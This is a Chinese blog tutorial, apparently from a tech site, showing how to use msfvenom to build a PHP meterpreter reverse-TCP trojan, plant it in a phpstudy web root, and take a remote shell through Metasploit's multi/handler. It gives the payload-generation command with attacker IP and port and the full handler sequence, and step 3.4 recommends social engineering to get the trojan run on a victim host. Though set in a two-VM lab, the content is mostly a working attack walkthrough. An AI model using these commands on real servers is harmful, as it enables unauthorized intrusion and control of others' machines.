vb6.0 生成exe被简称是木马_使用MSF渗透框架生成PHP木马并实现控制远程服务器

一、背景介绍

Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!

二、资源装备

1.安装好 Win7的虚拟机一台

2.整装待发的小白一个。

3.安装好的Kali Linux虚拟机一台。

战略安排

3.1 将受害者主机(Windows7)跟攻击者主机(Kali Linux)的网络模式全部设置为NAT模式,如下图所示。

步骤:打开虚拟机的设置/选择网络适配器/选择NAT模式。

ddccb5057b75ccf340a7be488ae1ea37.png

3.2 查看实验的两台主机的IP地址,如下图所示。

命令:ifconfig

a506985841d529e59765e967a4691a51.png

3.3 利用“msfvenom”木马生成工具生成对应的木马文件,如下图所示。

步骤1:msfvenom工具的参数介绍

-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的

-o, –out < path> 指定创建好的payload的存放位置。

-h, –help 查看帮助选项。

步骤2:利用msfvenom工具生成对应的木马文件,如下图所示。

命令:msfvenom -p 指定需要使用的payload(攻击荷载) lhost=攻击者主机IP -f exe > 生成木马文件的保存位置

例子:msfVenom -p php/meterpreter/reverse_tcp lhost=192.168.78.168 lport=4444 -r raw > /root/hack.php

0ecda55d743d0ad7ac902122d83cf6b1.png

步骤3:在已知的木马文件保存路径目录下查找对应的木马文件是否已经生成,如下图所示,木马文件已经存在(这里使用图形化文件管理系统来查看,你也可以利用ls命令查看对应路径下面是否已经生成对应的木马文件)。

ae6224ab9cda0c83c921d35c25318a62.png

3.4 利用一定的社会工程学方法将生成的木马文件发送到目标受害者主机,并且在受害者主机进行运行(对应的社会工程学知识请持续关注本号,后续讲解),如下图所示。

e9edba60fbebd453061ee681ce633842.png

3.5 安装“phpstudy集成环境”,如下图所示。

步骤1:打开“phpstudy”官网选择与你电脑系统相对应的软件版本下载。

步骤2:安装注意事项

1. 安装路径不能包含“中文”或者“空格”,否则会报错(例如错误提示:Can't change dir to 'G:\\x65b0\x5efa\x6587\)

2. 保证安装路径是纯净的,安装路径下不能有已安装的V8版本,若重新安装,请选择其它路径

步骤3:phpstudy官方使用教程,需者自取。

网址:https://www.php.cn/course/1066.html

a53d0674b8e67de08f5846ed7aa5044f.png

3.6 安装好对应的软件后,启动phpstudy中的环境,如下图所示。

步骤1:点击相应的环境旁边的启动按钮启动即可。

4a76ea5a4725b4cfc3415dfce92c84b8.png

步骤2:进入apache服务,如下图所示。

3e9537ef0db2fa930b17102523423a88.png

3.7 将对应的木马文件上传到apache服务的www目录下,如下图所示。

cbee9641f36dab9054117f8633e1e41b.png

3.8 启动Metasploit(msf)渗透框架,如下图所示。

命令1:msfconsole

d9b17e58881031e7c568fe240a94cd72.png

命令2:use exploit/multi/handler

b90b795c828184ca5108deb2653f31a1.png

命令3:set payload php/meterpreter/reverse_tcp

db8b23db39cfcf099ffcbe294e4a14b7.png

命令4:show options

38d52e1661e38d5ff1507e378d6ed41f.png

命令5:set lhost 192.168.78.168

822f3bb704fbe60bd50c17aed645a439.png

命令6:run(启动攻击模块)

b896ee35d06ecd1308c9454b6261c7e2.png

3.9 拿到目标主机服务器的shell,如下图所示。

命令:shell进入shell页面。

47d9b4f2e9f4093a97061824ad4a2d95.png

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值